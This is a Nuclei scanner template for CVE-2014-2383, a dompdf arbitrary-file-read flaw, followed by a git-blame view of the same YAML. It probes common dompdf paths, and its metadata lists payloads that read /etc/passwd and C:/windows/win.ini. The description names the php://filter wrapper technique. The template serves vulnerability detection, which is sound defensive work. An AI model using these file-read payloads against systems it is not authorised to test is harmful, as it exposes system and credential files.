nuclei-templates/cves/2014/CVE-2014-2383.yaml

id: CVE-2014-2383

info:
  name: Arbitrary file read in dompdf < v0.6.0
  author: 0x_Akoko
  severity: high
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-2383
    - https://www.exploit-db.com/exploits/33004
  classification:
    cve-id: CVE-2014-2383
  tags: cve,cve2014,dompdf,lfi
  metadata:
    win-payload: "/dompdf.php?input_file=C:/windows/win.ini"
    unix-payload: "/dompdf.php?input_file=/etc/passwd"
  description: "A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter."

requests:
  - method: GET
    path:
      - "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
      - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
      - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
      - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "application/pdf"
          - 'filename="dompdf_out.pdf"'
        part: header
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/02/24
more updates 2021-09-21 10:16:26 +00:00			`id: CVE-2014-2383`
Create CVE-2014-2383.yaml 2021-06-10 09:45:21 +00:00
			`info:`
			`name: Arbitrary file read in dompdf < v0.6.0`
			`author: 0x_Akoko`
			`severity: high`
Dashboard Text Enhancements (#3773) Dashboard Text Enhancements 2022-02-25 14:32:23 +00:00			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2014-2383`
			`- https://www.exploit-db.com/exploits/33004`
			`classification:`
			`cve-id: CVE-2014-2383`
more updates 2021-09-21 10:16:26 +00:00			`tags: cve,cve2014,dompdf,lfi`
			`metadata:`
			`win-payload: "/dompdf.php?input_file=C:/windows/win.ini"`
			`unix-payload: "/dompdf.php?input_file=/etc/passwd"`
Dashboard Text Enhancements (#3773) Dashboard Text Enhancements 2022-02-25 14:32:23 +00:00			`description: "A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter."`
Update CVE-2014-2383.yaml 2021-06-11 09:52:14 +00:00
Create CVE-2014-2383.yaml 2021-06-10 09:45:21 +00:00			`requests:`
			`- method: GET`
			`path:`
Update CVE-2014-2383.yaml 2021-06-11 09:03:43 +00:00			`- "{{BaseURL}}/dompdf.php?input_file=dompdf.php"`
Added more paths 2021-06-11 09:17:02 +00:00			`- "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"`
			`- "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"`
Update CVE-2014-2383.yaml 2021-06-12 11:12:57 +00:00			`- "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"`
Update CVE-2014-2383.yaml 2021-10-09 11:07:50 +00:00
Update CVE-2014-2383.yaml 2021-10-09 05:16:16 +00:00			`stop-at-first-match: true`
Create CVE-2014-2383.yaml 2021-06-10 09:45:21 +00:00			`matchers-condition: and`
			`matchers:`
Update CVE-2014-2383.yaml 2021-06-11 09:03:43 +00:00			`- type: word`
			`words:`
			`- "application/pdf"`
			`- 'filename="dompdf_out.pdf"'`
			`part: header`
Added more paths 2021-06-11 09:17:02 +00:00			`condition: and`
Create CVE-2014-2383.yaml 2021-06-10 09:45:21 +00:00
			`- type: status`
			`status:`
			`- 200`
Dashboard Text Enhancements (#3773) Dashboard Text Enhancements 2022-02-25 14:32:23 +00:00
			`# Enhanced by mp on 2022/02/24`